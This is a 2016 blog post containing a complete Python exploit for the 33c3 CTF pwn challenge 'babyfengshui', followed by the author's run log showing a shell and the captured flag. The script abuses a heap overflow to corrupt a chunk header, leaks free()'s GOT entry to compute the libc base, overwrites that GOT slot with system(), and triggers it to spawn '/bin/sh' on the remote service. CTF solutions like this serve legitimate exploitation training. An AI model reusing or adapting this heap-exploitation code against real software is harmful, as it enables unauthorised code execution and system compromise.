
[exploit] 2016 33c3 CTF - babyfengshui

by blackcon 2016. 12. 30.
#!/usr/bin/env python
import socket
import struct
import telnetlib
def p(x):
    """Pack *x* as a 4-byte little-endian unsigned int (struct format "<I")."""
    return struct.pack("<I", x)


def up(x):
    """Unpack a 4-byte little-endian unsigned int from *x* (exactly 4 bytes)."""
    return struct.unpack("<I", x)[0]

# Remote challenge endpoint used in the author's run.
host = "78.46.224.83"
port = 1456

# Plain TCP connection; AF_INET / SOCK_STREAM are socket()'s defaults.
s = socket.socket()
s.connect((host, port))

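def u_recv(st, sock=None):
    """Read from the connection one byte at a time until *st* has been seen.

    *st* and the returned buffer are byte strings (plain ``str`` on Python 2).

    Args:
        st: the marker (prompt text) to wait for.
        sock: socket to read from; defaults to the module-level connection ``s``.

    Returns:
        Everything received up to and including the first occurrence of *st*.

    Raises:
        EOFError: the peer closed the connection before *st* arrived.  The
            original looped forever here, because ``recv`` returns an empty
            string on EOF and the loop condition could never become true.
    """
    if sock is None:
        sock = s
    bf = b''
    while st not in bf:
        chunk = sock.recv(1)
        if not chunk:
            # Empty read means the remote end is gone; fail loudly instead of spinning.
            raise EOFError("connection closed before %r was received" % (st,))
        bf += chunk
    return bf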

## add a user
# Create two entries.  Each prompt/answer pair follows the service's menu:
# action 0, then description size, name, text length and the text itself.
print "[+] add a user"
add_dialog = (
    ("Action: ", "0\n"),
    ("size of description: ", "16\n"),
    ("name: ", "aaaa\n"),
    ("text length: ", "16\n"),
    ("text: ", "bbbb\n"),
)
for _ in range(2):
    for prompt, answer in add_dialog:
        u_recv(prompt)
        s.send(answer)
## delete a user
# Remove entry 0 (action 1, then the index).
print "[+] delete a user"
for prompt, answer in (("Action: ", "1\n"), ("index: ", "0\n")):
    u_recv(prompt)
    s.send(answer)

## add a user
## overwrite any table
# Add a third entry whose text is longer than the description size requested.
print "[+] overwrite the header of chunk"
for prompt, answer in (
    ("Action: ", "0\n"),
    ("size of description: ", "128\n"),
    ("name: ", "cccc\n"),
    ("text length: ", "164\n"),
):
    u_recv(prompt)
    s.send(answer)
u_recv("text: ")
# 160 bytes of filler ("/bin/sh\0" first, then 'a's) followed by the address the
# author identifies as free()'s GOT slot (0x804b010) in the challenge binary.
pay = "/bin/sh\x00".ljust(160, "a") + p(0x804b010)
s.send(pay + "\n")
# Display entry 1 (action 2).  The author reads the first 4 bytes of the printed
# description back as free()'s address in libc.
for prompt, answer in (("Action: ", "2\n"), ("index: ", "1\n")):
    u_recv(prompt)
    s.send(answer)
leak = up(u_recv("Action: ").split("description: ")[1][:4])

## libc_2.19.so -- offsets the author used for the remote libc build
FREE_OFF, SYSTEM_OFF, BINSH_OFF = 0x000760f0, 0x0003e3e0, 0x15f551
libc_base = leak - FREE_OFF
system = libc_base + SYSTEM_OFF
# binsh is computed for the log line only; nothing below uses it.
binsh = libc_base + BINSH_OFF
print "[!] LIBC_BASE: %x, system: %x, binsh: %x" % (libc_base, system, binsh)

## overwrite free_got to system()
# The "Action: " prompt was already consumed when the leak was read above,
# so this starts directly with the action number: action 3 on entry 1 with
# 4 bytes of new text (the packed system() address).
print "[+] overwrite the free_got"
s.send("3\n")
for prompt, answer in (
    ("index: ", "1\n"),
    ("text length: ", "4\n"),
    ("text: ", p(system) + "\n"),
):
    u_recv(prompt)
    s.send(answer)

## trigger
# Delete entry 2 (action 1, then the index); the author labels this as the step
# that hands over the shell.
print "[+] get the shell :D"
for prompt, answer in (("Action: ", "1\n"), ("index: ", "2\n")):
    u_recv(prompt)
    s.send(answer)

# Hand the already-connected socket to telnetlib for an interactive session.
shell = telnetlib.Telnet()
shell.sock = s
shell.interact()


# Session transcript recorded by the author.  It is a bare string literal at
# module level, so it has no runtime effect.
'''
blackcon@bk{~/33c3_ctf/pwn/babyfengshui}:./vuln.py
[+] add a user
[+] delete a user
[+] overwrite the header of chunk
[!] LIBC_BASE: f75de000, system: f761c3e0, binsh: f773d551
[+] overwrite the free_got
[+] get the shell :D
id
uid=1000(fengshui) gid=1000(fengshui) groups=1000(fengshui)
ls
babyfengshui
flag.txt
cat flag.txt
33C3_h34p_3xp3rts_c4n_gr00m_4nd_f3ng_shu1
'''